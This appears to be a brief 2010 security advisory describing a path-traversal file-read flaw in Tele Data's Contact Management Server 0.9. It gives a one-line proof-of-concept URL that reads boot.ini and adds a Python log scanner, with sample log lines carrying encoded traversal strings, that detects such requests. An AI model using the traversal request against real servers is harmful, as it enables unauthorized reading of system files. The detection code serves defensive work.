A local file inclusion vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to read files from the server file system.
PoC
Log in as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Load&FileName=..\..\..\..\..\..\..\..\..\boot.ini
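
A detection check for the request pattern in the PoC, added here as an example and not part of the original advisory: it flags `command.html` requests where `Cmd=SQL_Load` carries a `FileName` with `..` segments or an absolute path, including percent-encoded and double-encoded forms. The access-log format, the sample lines and the file name `contacts.sql` are constructed assumptions.

```python
import ntpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line as it appears in a common-log-format entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def is_traversal(filename):
    """True if a FileName value points outside the directory it is relative to."""
    # parse_qsl already decoded once; decode again to catch double encoding.
    name = unquote(filename).replace("/", "\\")
    drive, rest = ntpath.splitdrive(name)
    if drive or rest.startswith("\\"):  # C:\..., \\host\share\..., \rooted
        return True
    return ".." in rest.split("\\")

def flag_request(target):
    """True for command.html?Cmd=SQL_Load requests with a traversing FileName."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/command.html"):
        return False
    params = {}
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        params.setdefault(key.lower(), []).append(value)
    if "sql_load" not in (v.lower() for v in params.get("cmd", [])):
        return False
    return any(is_traversal(v) for v in params.get("filename", []))

def scan(log_lines):
    """Return the log lines whose request line is flagged."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and flag_request(match.group(1)):
            hits.append(line)
    return hits

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    r'127.0.0.1 - admin [23/May/2010:10:00:01 +0000] "GET /command.html?Cmd=SQL_Load&FileName=contacts.sql HTTP/1.1" 200 512',
    r'127.0.0.1 - admin [23/May/2010:10:00:09 +0000] "GET /command.html?Cmd=SQL_Load&FileName=..\..\..\boot.ini HTTP/1.1" 200 211',
    r'127.0.0.1 - admin [23/May/2010:10:00:15 +0000] "GET /command.html?Cmd=SQL_Load&FileName=%252e%252e%255cboot.ini HTTP/1.1" 200 211',
    r'127.0.0.1 - admin [23/May/2010:10:00:20 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("suspicious:", hit)
```

The same `is_traversal` test can serve as a server-side input check: reject the request before the file is opened whenever it returns true.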
Sunday, May 23, 2010